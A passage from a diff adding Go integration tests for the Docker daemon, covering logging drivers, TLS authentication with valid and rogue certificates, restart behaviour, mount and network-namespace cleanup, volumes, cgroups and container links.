c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) { + if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err != nil { + c.Fatal(err) + } + f, err := os.Open(logPath) + if err != nil { + c.Fatal(err) + } + defer f.Close() + + var res struct { + Log string `json:"log"` + Stream string `json:"stream"` + Time time.Time `json:"time"` + } + if err := json.NewDecoder(f).Decode(&res); err != nil { + c.Fatal(err) + } + if res.Log != "testline\n" { + c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n") + } + if res.Stream != "stdout" { + c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout") + } + if !time.Now().After(res.Time) { + c.Fatalf("Log time %v in future", res.Time) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) { + c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil) + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("logs", "test") + c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver")) + expected := `"logs" command is supported only for "json-file" and "journald" logging drivers (got: none)` + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { + dir, err := ioutil.TempDir("", "socket-cleanup-test") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(dir) + + sockPath := filepath.Join(dir, "docker.sock") + if err := s.d.Start("--host", "unix://"+sockPath); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(sockPath); err != nil { + c.Fatal("socket does not exist") + } + + if err := s.d.Stop(); err != nil { + c.Fatal(err) + } + + if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) { + c.Fatal("unix socket is not cleaned up") + } +} + +func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { + type Config struct { + Crv string `json:"crv"` + D string `json:"d"` + Kid string `json:"kid"` + Kty string `json:"kty"` + X string `json:"x"` + Y string `json:"y"` + } + + os.Remove("/etc/docker/key.json") + if err := s.d.Start(); err != nil { + c.Fatalf("Failed to start daemon: %v", err) + } + + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + config := &Config{} + bytes, err := ioutil.ReadFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error reading key.json file: %s", err) + } + + // byte[] to Data-Struct + if err := json.Unmarshal(bytes, &config); err != nil { + c.Fatalf("Error Unmarshal: %s", err) + } + + //replace config.Kid with the fake value + config.Kid = "VSAJ:FUYR:X3H2:B2VZ:KZ6U:CJD5:K7BX:ZXHY:UZXT:P4FT:MJWG:HRJ4" + + // NEW Data-Struct to byte[] + newBytes, err := json.Marshal(&config) + if err != nil { + c.Fatalf("Error Marshal: %s", err) + } + + // write back + if err := ioutil.WriteFile("/etc/docker/key.json", newBytes, 0400); err != nil { + c.Fatalf("Error ioutil.WriteFile: %s", err) + } + + defer os.Remove("/etc/docker/key.json") + + if err := s.d.Start(); err == nil { + c.Fatalf("It should not be successful to start daemon with wrong key: %v", err) + } + + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + + if !strings.Contains(string(content), "Public Key ID does not match") { + c.Fatalf("Missing KeyID message from daemon logs: %s", string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat") + if err != nil { + c.Fatalf("Could not run /bin/cat: err=%v\n%s", err, out) + } + containerID := strings.TrimSpace(out) + + if out, err := s.d.Cmd("kill", containerID); err != nil { + c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatalf("Could not restart daemon: %v", err) + } + + errchan := make(chan error) + go func() { + if out, err := s.d.Cmd("wait", containerID); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + + select { + case <-time.After(5 * time.Second): + c.Fatal("Waiting on a stopped (killed) container timed out") + case err := <-errchan: + if err != nil { + c.Fatal(err) + } + } +} + +// TestHTTPSInfo connects via two-way authenticated HTTPS to the info endpoint +func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) { + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "info", + } + out, err := s.d.Cmd(args...) + if err != nil { + c.Fatalf("Error Occurred: %s and output: %s", err, out) + } +} + +// TestHTTPSRun connects via two-way authenticated HTTPS to the create, attach, start, and wait endpoints. +// https://github.com/docker/docker/issues/19280 +func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) { + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "run", "busybox", "echo", "TLS response", + } + out, err := s.d.Cmd(args...) + if err != nil { + c.Fatalf("Error Occurred: %s and output: %s", err, out) + } + + if !strings.Contains(out, "TLS response") { + c.Fatalf("expected output to include `TLS response`, got %v", out) + } +} + +// TestTLSVerify verifies that --tlsverify=false turns on tls +func (s *DockerDaemonSuite) TestTLSVerify(c *check.C) { + out, err := exec.Command(dockerdBinary, "--tlsverify=false").CombinedOutput() + if err == nil || !strings.Contains(string(out), "Could not load X509 key pair") { + c.Fatalf("Daemon should not have started due to missing certs: %v\n%s", err, string(out)) + } +} + +// TestHTTPSInfoRogueCert connects via two-way authenticated HTTPS to the info endpoint +// by using a rogue client certificate and checks that it fails with the expected error. +func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) { + const ( + errBadCertificate = "bad certificate" + testDaemonHTTPSAddr = "tcp://localhost:4271" + ) + + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-rogue-cert.pem", + "--tlskey", "fixtures/https/client-rogue-key.pem", + "info", + } + out, err := s.d.Cmd(args...) + if err == nil || !strings.Contains(out, errBadCertificate) { + c.Fatalf("Expected err: %s, got instead: %s and output: %s", errBadCertificate, err, out) + } +} + +// TestHTTPSInfoRogueServerCert connects via two-way authenticated HTTPS to the info endpoint +// which provides a rogue server certificate and checks that it fails with the expected error +func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { + const ( + errCaUnknown = "x509: certificate signed by unknown authority" + testDaemonRogueHTTPSAddr = "tcp://localhost:4272" + ) + if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem", + "--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + args := []string{ + "--host", testDaemonRogueHTTPSAddr, + "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-rogue-cert.pem", + "--tlskey", "fixtures/https/client-rogue-key.pem", + "info", + } + out, err := s.d.Cmd(args...) + if err == nil || !strings.Contains(out, errCaUnknown) { + c.Fatalf("Expected err: %s, got instead: %s and output: %s", errCaUnknown, err, out) + } +} + +func pingContainers(c *check.C, d *Daemon, expectFailure bool) { + var dargs []string + if d != nil { + dargs = []string{"--host", d.sock()} + } + + args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top") + dockerCmd(c, args...) + + args = append(dargs, "run", "--rm", "--link", "container1:alias1", "busybox", "sh", "-c") + pingCmd := "ping -c 1 %s -W 1" + args = append(args, fmt.Sprintf(pingCmd, "alias1")) + _, _, err := dockerCmdWithError(args...) + + if expectFailure { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + + args = append(dargs, "rm", "-f", "container1") + dockerCmd(c, args...) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + socket := filepath.Join(s.d.folder, "docker.sock") + + out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(s.d.Restart(), check.IsNil) +} + +// os.Kill should kill daemon ungracefully, leaving behind container mounts. +// A subsequent daemon restart shoud clean up said mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + // container mounts should exist even after daemon has crashed. + comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + + // kill the container + runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id) + } + + // restart daemon. + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // Now, container mounts should be gone. + mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +// os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + + // Send SIGINT and daemon should clean up + c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil) + // Wait for the daemon to stop. + c.Assert(<-s.d.wait, checker.IsNil) + + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil) + + out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.Contains(out, "eth0"), check.Equals, false, + check.Commentf("There shouldn't be eth0 in container in default(bridge) mode when bridge network is disabled: %s", out)) + + out, err = s.d.Cmd("run", "--rm", "--net=bridge", "busybox", "ip", "l") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.Contains(out, "eth0"), check.Equals, false, + check.Commentf("There shouldn't be eth0 in container in bridge mode when bridge network is disabled: %s", out)) + // the extra grep and awk clean up the output of `ip` to only list the number and name of + // interfaces, allowing for different versions of ip (e.g. inside and outside the container) to + // be used while still verifying that the interface list is the exact same + cmd := exec.Command("sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '") + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + if err := cmd.Run(); err != nil { + c.Fatal("Failed to get host network interface") + } + out, err = s.d.Cmd("run", "--rm", "--net=host", "busybox", "sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(out, check.Equals, fmt.Sprintf("%s", stdout), + check.Commentf("The network interfaces in container should be the same with host when --net=host when bridge network is disabled: %s", out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + t.Fatal(err) + } + if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil { + t.Fatal(out, err) + } + + if err := s.d.Restart(); err != nil { + t.Fatal(err) + } + // Container 'test' should be removed without error + if out, err := s.d.Cmd("rm", "test"); err != nil { + t.Fatal(out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top") + if err != nil { + c.Fatal(out, err) + } + + // Get sandbox key via inspect + out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.SandboxKey}}'", "netns") + if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + fileName := strings.Trim(out, " \r\n'") + + if out, err := s.d.Cmd("stop", "netns"); err != nil { + c.Fatal(out, err) + } + + // Test if the file still exists + out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) + out = strings.TrimSpace(out) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out)) + + // Remove the container and restart the daemon + if out, err := s.d.Cmd("rm", "netns"); err != nil { + c.Fatal(out, err) + } + + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + // Test again and see now the netns file does not exist + out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) + out = strings.TrimSpace(out) + c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out)) +} + +// tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored +func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) { + host := "tcp://localhost:4271" + c.Assert(s.d.Start("-H", host), check.IsNil) + cmd := exec.Command(dockerBinary, "-H", host, "info") + cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"} + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out)) + c.Assert(strings.Contains(out, "error during connect"), check.Equals, true) + +} + +func setupV6(c *check.C) { + // Hack to get the right IPv6 address on docker0, which has already been created + result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0") + result.Assert(c, icmd.Expected{}) +} + +func teardownV6(c *check.C) { + result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0") + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") + c.Assert(err, check.IsNil) + id := strings.TrimSpace(out) + + _, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil) + _, err = s.d.Cmd("wait", id) + c.Assert(err, check.IsNil) + + out, err = s.d.Cmd("ps", "-q") + c.Assert(err, check.IsNil) + c.Assert(out, check.Equals, "") + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("ps", "-q") + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, id[:12]) +} + +func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { + if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil { + c.Fatal(err) + } + name := "logtest" + out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err)) + + out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Config }}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(out, checker.Contains, "max-size:1k") + c.Assert(out, checker.Contains, "max-file:5") + + out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Type }}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "json-file") +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil { + c.Fatal(err, out) + } + if out, err := s.d.Cmd("pause", "test"); err != nil { + c.Fatal(err, out) + } + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + errchan := make(chan error) + go func() { + out, err := s.d.Cmd("start", "test") + if err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + name := strings.TrimSpace(out) + if name != "test" { + errchan <- fmt.Errorf("Paused container start error on docker daemon restart, expected 'test' but got '%s'", name) + } + close(errchan) + }() + + select { + case <-time.After(5 * time.Second): + c.Fatal("Waiting on start a container timed out") + case err := <-errchan: + if err != nil { + c.Fatal(err) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { + c.Assert(s.d.StartWithBusybox(), check.IsNil) + + out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("volume", "rm", "test") + c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart")) + c.Assert(out, checker.Contains, "in use") +} + +func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) { + c.Assert(s.d.Start(), check.IsNil) + + _, err := s.d.Cmd("volume", "create", "test") + c.Assert(err, check.IsNil) + c.Assert(s.d.Restart(), check.IsNil) + + _, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) { + c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) + expected := "Failed to set log opts: syslog-address should be in form proto://address" + runCmd := exec.Command("grep", expected, s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) { + c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) + expected := "Failed to set log opts: invalid fluentd-address corrupted:c: " + runCmd := exec.Command("grep", expected, s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) { + s.d.useDefaultHost = true + defer func() { + s.d.useDefaultHost = false + }() + c.Assert(s.d.Start(), check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { + s.d.useDefaultTLSHost = true + defer func() { + s.d.useDefaultTLSHost = false + }() + if err := s.d.Start( + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem"); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + // The client with --tlsverify should also use default host localhost:2376 + tmpHost := os.Getenv("DOCKER_HOST") + defer func() { + os.Setenv("DOCKER_HOST", tmpHost) + }() + + os.Setenv("DOCKER_HOST", "") + + out, _ := dockerCmd( + c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/client-cert.pem", + "--tlskey", "fixtures/https/client-key.pem", + "version", + ) + if !strings.Contains(out, "Server") { + c.Fatalf("docker version should return information of server side") + } +} + +func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + bridgeIP := "192.169.1.1" + bridgeRange := bridgeIP + "/30" + + err := s.d.StartWithBusybox("--bip", bridgeRange) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + var cont int + for { + contName := fmt.Sprintf("container%d", cont) + _, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") + if err != nil { + // pool exhausted + break + } + ip, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.IPAddress}}'", contName) + c.Assert(err, check.IsNil) + + c.Assert(ip, check.Not(check.Equals), bridgeIP) + cont++ + } +} + +// Test daemon for no space left on device error +func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux, Network) + + testDir, err := ioutil.TempDir("", "no-space-left-on-device-test") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + c.Assert(mount.MakeRShared(testDir), checker.IsNil) + defer mount.Unmount(testDir) + + // create a 2MiB image and mount it as graph root + // Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile) + dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0") + out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox + c.Assert(err, checker.IsNil, check.Commentf(out)) + + cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img")) + loout, err := cmd.CombinedOutput() + c.Assert(err, checker.IsNil) + loopname := strings.TrimSpace(string(loout)) + defer exec.Command("losetup", "-d", loopname).Run() + + dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname)) + defer mount.Unmount(filepath.Join(testDir, "test-mount")) + + err = s.d.Start("--graph", filepath.Join(testDir, "test-mount")) + defer s.d.Stop() + c.Assert(err, check.IsNil) + + // pull a repository large enough to fill the mount point + pullOut, err := s.d.Cmd("pull", "registry:2") + c.Assert(err, checker.NotNil, check.Commentf(pullOut)) + c.Assert(pullOut, checker.Contains, "no space left on device") +} + +// Test daemon restart with container links + auto restart +func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + parent1Args := []string{} + parent2Args := []string{} + wg := sync.WaitGroup{} + maxChildren := 10 + chErr := make(chan error, maxChildren) + + for i := 0; i < maxChildren; i++ { + wg.Add(1) + name := fmt.Sprintf("test%d", i) + + if i < maxChildren/2 { + parent1Args = append(parent1Args, []string{"--link", name}...) + } else { + parent2Args = append(parent2Args, []string{"--link", name}...) + } + + go func() { + _, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + chErr <- err + wg.Done() + }() + } + + wg.Wait() + close(chErr) + for err := range chErr { + c.Assert(err, check.IsNil) + } + + parent1Args = append([]string{"run", "-d"}, parent1Args...) + parent1Args = append(parent1Args, []string{"--name=parent1", "--restart=always", "busybox", "top"}...) + parent2Args = append([]string{"run", "-d"}, parent2Args...) + parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...) + + _, err = s.d.Cmd(parent1Args...) + c.Assert(err, check.IsNil) + _, err = s.d.Cmd(parent2Args...) + c.Assert(err, check.IsNil) + + err = s.d.Stop() + c.Assert(err, check.IsNil) + // clear the log file -- we don't need any of it but may for the next part + // can ignore the error here, this is just a cleanup + os.Truncate(s.d.LogFileName(), 0) + err = s.d.Start() + c.Assert(err, check.IsNil) + + for _, num := range []string{"1", "2"} { + out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num) + c.Assert(err, check.IsNil) + if strings.TrimSpace(out) != "true" { + log, _ := ioutil.ReadFile(s.d.LogFileName()) + c.Fatalf("parent container is not running\n%s", string(log)) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + name := "cgroup-test" + + err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup") + c.Assert(err, checker.IsNil) + cgroupPaths := parseCgroupPaths(string(out)) + c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out))) + out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(string(out)) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + c.Assert(found, checker.True, check.Commentf("Cgroup path for container (%s) doesn't found in cgroups file: %s", expectedCgroup, cgroupPaths)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc") + c.Assert(err, check.IsNil, check.Commentf(out)) + + c.Assert(s.d.Restart(), check.IsNil) + + // should fail since test is not running yet + out, err = s.d.Cmd("start", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + + out, err = s.d.Cmd("start", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(strings.Contains(out, "1 packets transmitted, 1 packets received"), check.Equals, true, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("create", "--name=test", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "--name=test2", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + test2ID := strings.TrimSpace(out) + + out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top") + test3ID := strings.TrimSpace(out) + + c.Assert(s.d.Restart(), check.IsNil) + + out, err = s.d.Cmd("create", "--name=test", "busybox") + c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name")) + // this one is no longer needed, removing simplifies the remainder of the test + out, err = s.d.Cmd("rm", "-f", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("ps", "-a", "--no-trunc") + c.Assert(err, check.IsNil, check.Commentf(out)) + + lines := strings.Split(strings.TrimSpace(out), "\n")[1:] + + test2validated := false + test3validated := false + for _, line := range lines { + fields := strings.Fields(line) + names := fields[len(fields)-1] + switch fields[0] { + case test2ID: + c.Assert(names, check.Equals, "test2,test3/abc") + test2validated = true + case test3ID: + c.Assert(names, check.Equals, "test3") + test3validated = true + } + } + + c.Assert(test2validated, check.Equals, true) + c.Assert(test3validated, check.Equals, true) +} + +// TestDaemonRestartWithKilledRunningContainer requires live restore of running containers +func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) { + // TODO(mlaventure): Not sure what would the exit code be on windows + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox(); err != nil { + t.Fatal(err) + } + + cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") + defer s.d.Stop() + if err != nil { + t.Fatal(cid, err) + } + cid = strings.TrimSpace(cid) + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid) + 